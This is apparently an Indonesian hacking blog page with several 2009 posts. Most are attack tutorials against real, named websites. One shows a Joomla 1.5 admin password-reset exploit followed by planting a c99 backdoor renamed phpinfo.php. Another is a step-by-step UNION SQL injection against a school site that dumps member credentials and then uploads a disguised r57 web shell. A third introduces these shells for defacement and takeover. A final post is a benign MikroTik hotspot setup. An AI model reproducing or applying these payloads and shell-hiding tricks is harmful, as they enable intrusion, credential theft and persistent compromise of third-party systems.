.png)
- tutorial ini buat temen gw yang request... thanks dah mo request ke gw. gw akan jelasin simplenya ajah yach...
ok, first... gak semua joomla bisa dihack loch (inget)... joomla yang bisa di hack itu versi 1.5.5 kebawah... jadi untung-untungan ya...
nich... dah ketemu salah satu samplenya..
hole di joomla v1.5.x adalah lo bisa reset password admin sesuka lo..
coba lo tambahin 'option=com_user&view=reset&layout=confirm' dibelakang index.php
jadinya :
http://www.sttif-bogor.com/main/index.php?option=com_user&view=reset&layout=confirm
waktu masukin token, isi aja pake ' trus klik submit untuk melakukan reset password... trus ganti dech ma yang baru
kalo udah,, ya masuk aja ke adminnya...
login dech... default usernamenya admin trus passwordnya yang tadi kita ubah...
masuk dech...
nach... yang kudu kita siapin :
1. backdoor (c99)... rename ajah jadi phpinfo.php biar ga ketauan...
2. template yang sesuai ama versi joomlanya (1.5) jangan gde² kpasitasny -200kb recomended
jalanin dech backdoornya... lo kudu tau adnya dimana...
http://www.sttif-bogor.com/main/templates/gravity/phpinfo.php
slese dech...
-
Start with BlindSQL Injection, Finishing with r57
Posted: Sat, 11 Apr 2009 15:19:00 +0000
nah... kayanya lo semua dah pada tau dech tentang BlindSQL injection... dari ttorial gw yang kemarin gw rasa dah cukup jelas fungsi dan kegunaan BlindSQL injection.. hanya saja tutorial gw yang kemarin BlindSQL injection untuk MySQL versi 4.
yang gw beri sekarang itu BlindSQL injection untuk MySQL versi 5 jadi gak perlu repot-repot nebak data basenya okeh...
nih... step by stepnya gak usah gw terangin juga dah ngerti kan...
http://sma74jkt.sch.id/berita/media_detail.php?recordID=240'
http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+order+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
kolomnya cuma 19
http://sma74jkt.sch.id/berita
/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
http://sma74jkt.sch.id/berita
/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19--
nah untuk ngecek tablenya sekarang pake ini :
http://sma74jkt.sch.id/berita
/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,table_name,13,14,15,16,17,18,19+from+information_schema.tables--
lo juga bisa tambahin syntax limit biar diliat berdasar no urut tabel.
http://sma74jkt.sch.id/berita
/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,table_name,13,14,15,16,17,18,19+from+information_schema.tables+limit+17,1--
atau tambahin pake group_concat biar rapih dilihatnya...
http://sma74jkt.sch.id/berita
/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name),13,14,15,16,17,18,19+from+information_schema.tables--
buat lihat kolomnya juga sama seperti melihat kolom
http://sma74jkt.sch.id/berita
/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(column_name),13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=anggota--
tapi ada beberapa web yang gak mau langsung ngebaca table pake huruf biasa. jadi harus di convert jadi hexa dulu. jadinya :
http://sma74jkt.sch.id/berita
/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(column_name),13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=0x0x616e67676f7461--
sekarang tinggal liat isinya:
http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(no_anggota,0x3a,nama,0x3a,nama_lengkap,0x3a,password,0x3a,status,0x3a,level),13,14,15,16,17,18,19+from+anggota--
dah ketemu ya... nah kalo gini caranya mah tinggal login ajah... abisnya passwordnya gak pake MD5 sich... yaudah sekarang baru nebak loginnya ada dimana ya???
ketemunya sich disini :
http://sma74jkt.sch.id/login.php
yaudah dech... sekarang tinggal upload backdoornya (r57). tapi lebih nyaman kalo kita taro didepan aja dech... sekalian biar gak terlalu mencurigakan bikin folder conf ajah.
kalo udah upload r57 nya... kasih nama lain biar ga terlalu mencurigakan... misalkan phpinfo.php
selesai dech....
-
Pengenalan C99 & r57 [backdoor]
Posted: Sat, 11 Apr 2009 14:31:00 +0000
mungkin ini udah gak asing buat web hacker yang udah advance yach... tapi gw cuma share aja buat sesama newbie...
evilshell atao biasa disebut backdoor dalam web hacking emang sangat dibutuhin... ibarat lo dah kuasain penuh website tsb... mau lo deface, mo di shuttingdown, mo lo kasi tau admin tentang celahnya, ato mo lo kuasain admin and jadi admin di web ntu... itu nantinya...
ada 2 evilshell yang biasa dipake buat web hacking... yaitu c99 dan r57
nih screenshoot buat c99
dan ini screenshoot bwt r57
mah, dari keduanya emang rata-rata punya fitur yang hampir sama... cobain aja
Mikrotik Untuk Hotspot - Part 2
Posted: Sat, 11 Apr 2009 14:02:00 +0000
posting gw yang kemaren kan ngebahas tentang mikrotik sebagai hotspot ya.. dan kemaren juga gw kasih tau proses installasinya kan, dan sekarang gw kasih tau konfigurasinya..lo harus download dulu winbox dari mikrotiknya. dari sini
sekarang coba jalanin winboxnya
nah itu berarti mikrotik lo belom di set IPnya. klik aja trus klik connect
nah, dah masuk tampilan winbox...
trus ikutin aja cara-cara disini ya...
masukin password baru
masukin identitas baru
tambahin IP kesetiap ethernet
tambahin route baru, biar kalo misalnya si klien mau ke web apa aja harus lewat lo dulu
sekarang setting hotspotnya
keliatan ga sih???
settingan hotspot selesai...
sekarang setting buat kelompok, user per kelompok dan limit bandwidth per kelompok
gw bikin kelompok 'member' punya bandwidth 128kbps bwt upload dan 256kbps buat download
nah gw bikin username 'ivine' dengan password '123' yang ikutan kelompok 'member'
coba sekarang lo akses google.com dari laptop... lo cari koneksi hotspot lo dan ini yang akan terjadi
sukses dech...
sumber : http://feeds2.feedburner.com/blogspot/EHgf
No comments:
Post a Comment
Terima kasih atas komentarnya